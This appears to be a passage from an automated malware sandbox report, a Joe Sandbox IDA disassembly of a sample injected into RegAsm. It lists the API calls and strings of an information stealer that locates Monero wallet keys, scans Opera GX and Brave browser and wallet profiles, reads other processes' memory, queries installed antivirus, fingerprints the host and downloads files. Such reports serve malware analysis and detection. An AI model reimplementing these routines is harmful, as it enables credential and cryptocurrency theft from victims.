Instruction ID: 735b7a5339effcfe679080928f79d8b6525980b66e78d205f4b2077015f7fe3f
Opcode Fuzzy Hash: 7cda63c94a758bafb6697a22e12d7bccad653b8ed9f67adf24258897b214a233
Instruction Fuzzy Hash: 5661B171900219AFEB10DB94CC85FEFB7BDEB49704F50412AFA05B3281DB785E488BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00404B90 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 194networkmemoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 00404412
Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 0040441F
Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 0040442C
Part of subcall function 004043C0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00404446
Part of subcall function 004043C0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404456

GetProcessHeap.KERNEL32(00000000,05F5E0FF,?,?,?,?,?,?,00000000), ref: 00404BEB
RtlAllocateHeap.NTDLL(00000000,?,?,?,?,?,?,00000000), ref: 00404BF2
InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00404C10
StrCmpCA.SHLWAPI(?,0156F910,?,?,?,?,?,?,00000000), ref: 00404C26
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404C51
HttpOpenRequestA.WININET(00000000,GET,?,01572300,00000000,00000000,-00400100,00000000), ref: 00404C8B
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00404CB0
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00404CC2
HttpQueryInfoA.WININET(000000FF,00000013,?,?,00000000), ref: 00404CE4
InternetReadFile.WININET(000000FF,?,00000400,00000001), ref: 00404D54
InternetCloseHandle.WININET(00000000), ref: 00404D85
InternetCloseHandle.WININET(00000000), ref: 00404D8F
InternetCloseHandle.WININET(?), ref: 00404D99

Strings

GET, xrefs: 00404C85

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttp$HeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
String ID: GET
API String ID: 442264750-1805413626
Opcode ID: d96827362c050016904704239267fdca9c3506fedfb8dff29f49c71fa97ce464
Instruction ID: e4d9ae68b354d6a53ac565d60b82c8593cc119c1dcfd6e68e0806bb865507591
Opcode Fuzzy Hash: d96827362c050016904704239267fdca9c3506fedfb8dff29f49c71fa97ce464
Instruction Fuzzy Hash: 486171B5A00219ABDB20DBA4DC45FEFB7B9EB49B10F504129FA05F72C0D7789904CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040D607 Relevance: 23.1, APIs: 8, Strings: 5, Instructions: 365fileCOMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(?,00427BE0), ref: 0040D61C
StrCmpCA.SHLWAPI(?,00427BE4), ref: 0040D636

Part of subcall function 0040FF10: lstrlen.KERNEL32(00418949,?,00000000,?,00417FAF,004283A3,004283A2,00000000,?,00000000,00423261,000000FF,?,00418949), ref: 0040FF1B
Part of subcall function 0040FF10: lstrcpy.KERNEL32(00000000,00418949), ref: 0040FF52

Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,01562EF0,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

StrCmpCA.SHLWAPI(00000000,Opera GX,00000000,?,?,?,00427BE8,?,?,00427A9E), ref: 0040D6E7
StrCmpCA.SHLWAPI(00000000,Brave,00000000,?,0156F680,?,00427C0C,?,0156F850,?,00427C08,00000000,?,?,?,00427BE8), ref: 0040D8F0
StrCmpCA.SHLWAPI(?,Preferences), ref: 0040D90A
StrCmpCA.SHLWAPI(?,01572150), ref: 0040DADF
StrCmpCA.SHLWAPI(?,0156F680), ref: 0040DB65
StrCmpCA.SHLWAPI(00000000,0156F850), ref: 0040DB7F

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

Part of subcall function 0040D090: CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,00000000,?), ref: 0040D149

FindNextFileA.KERNEL32(00000000,?), ref: 0040E128
FindClose.KERNEL32(00000000), ref: 0040E137

Strings

Opera GX, xrefs: 0040D6D6
Brave, xrefs: 0040D8DF
\BraveWallet\Preferences, xrefs: 0040D9E4
F, xrefs: 0040E179
Preferences, xrefs: 0040D8FE

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFindlstrcatlstrlen$CloseCopyNext
String ID: Brave$F$Opera GX$Preferences$\BraveWallet\Preferences
API String ID: 704657350-2999302618
Opcode ID: 2fdd9b735f7aec4fc181650f2b725c313ab5a4168f1f17ea961b8ed24fa6f537
Instruction ID: a4fda989be0599bcb8e2ee1ea547159008252c3dc3d0dda2ce429139a213b2aa
Opcode Fuzzy Hash: 2fdd9b735f7aec4fc181650f2b725c313ab5a4168f1f17ea961b8ed24fa6f537
Instruction Fuzzy Hash: 6AE15270900249DADB14EBA5C955BDDBBB86F19304F5040AEF949B32C2DF781B4CCBA6

Uniqueness

Uniqueness Score: -1.00%

Function 00401D90 Relevance: 23.0, APIs: 9, Strings: 4, Instructions: 202memorystringregistryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00401DC4
GetProcessHeap.KERNEL32(00000000,00000104), ref: 00401DDA
HeapAlloc.KERNEL32(00000000), ref: 00401DE1
RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,000000FF), ref: 00401DFE
RegQueryValueExA.ADVAPI32(000000FF,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401E18

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

Part of subcall function 00415650: Sleep.KERNEL32(000003E8,00422AB9,fA,?,?,?,00000001), ref: 00415716
Part of subcall function 00415650: CreateThread.KERNEL32(00000000,00000000,004140D0,?,00000000,00000000), ref: 00415737
Part of subcall function 00415650: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00415743

lstrcat.KERNEL32(?,00000000), ref: 00401E30
lstrlen.KERNEL32(?), ref: 00401E3D
lstrcat.KERNEL32(?,.keys), ref: 00401E58
memset.MSVCRT ref: 00401FE0

Strings

SOFTWARE\monero-project\monero-core, xrefs: 00401DF2
\Monero\wallet.keys, xrefs: 00401E82
.keys, xrefs: 00401E4C
wallet_path, xrefs: 00401E12

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heaplstrcatmemset$AllocCreateObjectOpenProcessQuerySingleSleepThreadValueWaitlstrcpylstrlen
String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
API String ID: 1905561306-218353709
Opcode ID: 1836b18f4c90fefa574bf900dff498b3f1cb10877020fc0ecb3275706c03e4d9
Instruction ID: b7190e78a0ece566d30ab40e821a7b759709afa39e85f3d509ad0c7fbb479532
Opcode Fuzzy Hash: 1836b18f4c90fefa574bf900dff498b3f1cb10877020fc0ecb3275706c03e4d9
Instruction Fuzzy Hash: F3817F71900249EACB14EBE5DC55BEDBBB8AF19308F54416EFA05B31C2DB781608CBB5

Uniqueness

Uniqueness Score: -1.00%

Function 0040FB80 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 200stringCOMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT ref: 0040FBAB
OpenProcess.KERNEL32(001FFFFF,00000000,00000000,00000000), ref: 0040FBD3
strlen.MSVCRT ref: 0040FBF4
memset.MSVCRT ref: 0040FC30
ReadProcessMemory.KERNEL32(00000000,00000000,00000000,00000208,00000000), ref: 0040FC8B
strlen.MSVCRT ref: 0040FC98
strlen.MSVCRT ref: 0040FCDE
memset.MSVCRT ref: 0040FD2A

Strings

65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0040FC46, 0040FD43
N0ZWFt, xrefs: 0040FCD9, 0040FCE9

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: strlen$Processmemset$MemoryOpenRead
String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30$N0ZWFt
API String ID: 47329967-1622206642
Opcode ID: ce9f98cd1290e10ba5df6a9b0258a31b39d28b0bda0bf5cec186aefdc81189ca
Instruction ID: 21a460605aad31a862c186db400c004e6ee40eb0e1eca90a670e2fa51daa2b6d
Opcode Fuzzy Hash: ce9f98cd1290e10ba5df6a9b0258a31b39d28b0bda0bf5cec186aefdc81189ca
Instruction Fuzzy Hash: ED612171D04208AAEB30DBA1DC42BEFBA78AF80314F14413EF915776C1D77C59888BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00413EA0 Relevance: 21.2, APIs: 5, Strings: 7, Instructions: 159stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

Part of subcall function 00405A30: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405AA8
Part of subcall function 00405A30: StrCmpCA.SHLWAPI(?,0156F910,?,?,?,?,?,?,00000004), ref: 00405AC0
Part of subcall function 00405A30: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405AE4
Part of subcall function 00405A30: HttpOpenRequestA.WININET(00000000,GET,?,01572300,00000000,00000000,-00400100,00000000), ref: 00405B1B
Part of subcall function 00405A30: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405B3F

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413F37
lstrlen.KERNEL32(00000000), ref: 00413F4E

Part of subcall function 00411750: LocalAlloc.KERNEL32(00000040,?,00000000,00000001,00000004,?,00413F63,00000000,00000000), ref: 0041176C

StrStrA.SHLWAPI(00000000,00000000), ref: 00413F7A
lstrlen.KERNEL32(00000000), ref: 00413F8F
lstrlen.KERNEL32(00000000), ref: 00413FAC

Strings

ERROR, xrefs: 00413F29
ERROR, xrefs: 00414010
ERROR, xrefs: 00414051
2HA, xrefs: 004140BB
2HA, xrefs: 00414095, 00413FD9
ERROR, xrefs: 00413FBE
ERROR, xrefs: 00413FFA

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internetlstrcpylstrlen$Open$AllocConnectHttpLocalOptionRequest
String ID: 2HA$2HA$ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 2440237315-3818902335
Opcode ID: ba1a200859b163294dc80f6353d27c9f4c925f5c19d5cf76e862733a802edbfa
Instruction ID: c74f93b79e1a96af938dd9262021b5edd6203cb7113eed4730bfd43c5734313e
Opcode Fuzzy Hash: ba1a200859b163294dc80f6353d27c9f4c925f5c19d5cf76e862733a802edbfa
Instruction Fuzzy Hash: 7E519134901249AACB11EBA5C9517DDBBA8AF19308F64407EF90573282DF7C5B48C7E6

Uniqueness

Uniqueness Score: -1.00%

Function 00411260 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 136comCOMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(00000000,00000000,?,00000000,?,AV: ,00000000,?,00428430,00000000,?,00000000,00000000), ref: 00411283
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,?,AV: ,00000000,?,00428430), ref: 00411294
CoCreateInstance.OLE32(00428D34,00000000,00000001,00428C64,?,?,00000000,?,AV: ,00000000,?,00428430,00000000,?,00000000,00000000), ref: 004112AE
CoSetProxyBlanket.OLE32(00428430,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,?,AV: ,00000000,?,00428430,00000000), ref: 004112E7
VariantInit.OLEAUT32(?), ref: 00411342

Part of subcall function 00411670: LocalAlloc.KERNEL32(00000040,00000005,00000000,?,0041136B,?,?,00000000,?,AV: ,00000000,?,00428430,00000000,?,00000000), ref: 00411678
Part of subcall function 00411670: CharToOemW.USER32(?,00000000), ref: 00411685

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

VariantClear.OLEAUT32(?), ref: 0041137D

Strings

root\SecurityCenter2, xrefs: 004112C6
WQL, xrefs: 00411304
displayName, xrefs: 00411357
Unknown, xrefs: 00411394
Unknown, xrefs: 0041139B
Select * From AntiVirusProduct, xrefs: 004112F7

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InitializeVariant$AllocBlanketCharClearCreateInitInstanceLocalProxySecuritylstrcpy
String ID: Select * From AntiVirusProduct$Unknown$Unknown$WQL$displayName$root\SecurityCenter2
API String ID: 685420537-2776955613
Opcode ID: d780461ba901a512690bf7f16fc62c8f5d007367dc3ab2bd1b8bee44b6a6e4fb
Instruction ID: 40a9cb50dccdf73a38e95a76c9e526bc5b1cbb250bb0618e8cd6fd3f3244c3ba
Opcode Fuzzy Hash: d780461ba901a512690bf7f16fc62c8f5d007367dc3ab2bd1b8bee44b6a6e4fb
Instruction Fuzzy Hash: 6C417F71B01629ABCB20DB85DC49FEFBB78EF49B50F10421AF515A7290C7789941CBE4

Uniqueness

Uniqueness Score: -1.00%

Function 00410860 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 210registrystringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

RegOpenKeyExA.KERNEL32(00000000,01566258,00000000,00020019,00000000,004280BF,?,00000001), ref: 004108BF
RegEnumKeyExA.KERNEL32(00000000,?,?,00428524,00000000,00000000,00000000,00000000,?,?,00000001), ref: 0041091E
wsprintfA.USER32 ref: 00410947
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,?), ref: 00410965
RegQueryValueExA.KERNEL32(?,01572018,00000000,000F003F,?,00000400), ref: 00410995
lstrlen.KERNEL32(?), ref: 004109AA
RegQueryValueExA.KERNEL32(?,01572108,00000000,000F003F,?,00000400,00000000,00421E41,?,00000000,?,004280F0), ref: 00410A2E

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

Strings

?, xrefs: 004108B5
%s\%s, xrefs: 00410941
- , xrefs: 00410A38

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: OpenQueryValuelstrcpy$Enumlstrlenwsprintf
String ID: - $%s\%s$?
API String ID: 1989970852-3278919252
Opcode ID: b7db24d05970cf0cf434d56626852d945b4fea331a45fae036690235d3bd5aa6
Instruction ID: 46b3b7c26f9db54fd8d8a07889e13f83e758814ada42e2adbf2fffcbf2ed9ca1
Opcode Fuzzy Hash: b7db24d05970cf0cf434d56626852d945b4fea331a45fae036690235d3bd5aa6
Instruction Fuzzy Hash: 158148B190021DABCB14DBA5DC94AEEBBB8BF59704F10816EF505B3241DB785A48CBB4

Uniqueness

Uniqueness Score: -1.00%

Function 00410D90 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 133memorystringCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00410DC8
GetVolumeInformationA.KERNEL32(00421EB9,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00410E01
GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410E4D
HeapAlloc.KERNEL32(00000000), ref: 00410E54
wsprintfA.USER32 ref: 00410E91
lstrcat.KERNEL32(00000000,00428098), ref: 00410EA0

Part of subcall function 00410D30: GetCurrentHwProfileA.ADVAPI32(?), ref: 00410D45

lstrlen.KERNEL32(00000000), ref: 00410EC2

Part of subcall function 00411BD0: malloc.MSVCRT ref: 00411BE1
Part of subcall function 00411BD0: strncpy.MSVCRT ref: 00411BF1

lstrcat.KERNEL32(00000000,00000000), ref: 00410EF0

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Strings

C, xrefs: 00410DD2
:\, xrefs: 00410DF7

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heaplstrcat$AllocCurrentDirectoryInformationProcessProfileVolumeWindowslstrcpylstrlenmallocstrncpywsprintf
String ID: :\$C
API String ID: 2389002695-3309953409
Opcode ID: bfed51b7b5bf34afebfa62e898e320037828684205222335e9b0ccf5d3cf25f1
Instruction ID: cd9e33ec6b3912d753ff03e78be9aa97267fc370a97b6a7823d5d9fd7b56550d
Opcode Fuzzy Hash: bfed51b7b5bf34afebfa62e898e320037828684205222335e9b0ccf5d3cf25f1
Instruction Fuzzy Hash: 3C41F571900219ABDB10EBE4DC15BEEBBB9EF18704F10015EFA05B3281DB785A44C7E9

Uniqueness

Uniqueness Score: -1.00%

Function 00405850 Relevance: 15.1, APIs: 10, Instructions: 147networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 00404412
Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 0040441F
Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 0040442C
Part of subcall function 004043C0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00404446
Part of subcall function 004043C0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404456

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004058B5
StrCmpCA.SHLWAPI(?,0156F910,?,?,?,?,?,?,0000000D), ref: 004058ED
InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,-00800100,00000000), ref: 00405912
CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000,?,?,?,?,?,?,0000000D), ref: 00405935
InternetReadFile.WININET(00000000,?,00000400,000000FF), ref: 0040594E
WriteFile.KERNEL32(00000000,?,000000FF,004203D8,00000000,?,?,?,?,?,?,0000000D), ref: 0040596E
InternetReadFile.WININET(00000000,?,00000400,000000FF), ref: 00405998
CloseHandle.KERNEL32(00000000,?,00000400,?,?,?,?,?,?,0000000D), ref: 004059B4
InternetCloseHandle.WININET(00000000), ref: 004059BB
InternetCloseHandle.WININET(00000000), ref: 004059C2

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$File$CloseHandle$OpenRead$CrackCreateWritelstrcpylstrlen
String ID:
API String ID: 105467990-0
Opcode ID: c4109292c8110849cfa300a677a80d25b5afcc4c1a20c8ab03a072282df57230
Instruction ID: 13221a786792afbe71e2db2b5b3dd3a866a49aaf32af835bc09817eda76de5d3
Opcode Fuzzy Hash: c4109292c8110849cfa300a677a80d25b5afcc4c1a20c8ab03a072282df57230
Instruction Fuzzy Hash: 8C518F75500249EBDB10DBA0CC46FEE77B8EB05704F60416AFA01E72C1DB786A48CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 004043C0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 63stringnetworkCOMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT ref: 00404412
??_U@YAPAXI@Z.MSVCRT ref: 0040441F
??_U@YAPAXI@Z.MSVCRT ref: 0040442C
lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00404446
InternetCrackUrlA.WININET(00000000,00000000), ref: 00404456

Strings

zZ@, xrefs: 0040447A
zZ@, xrefs: 0040443D, 0040444D, 0040446B
<, xrefs: 00404402

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
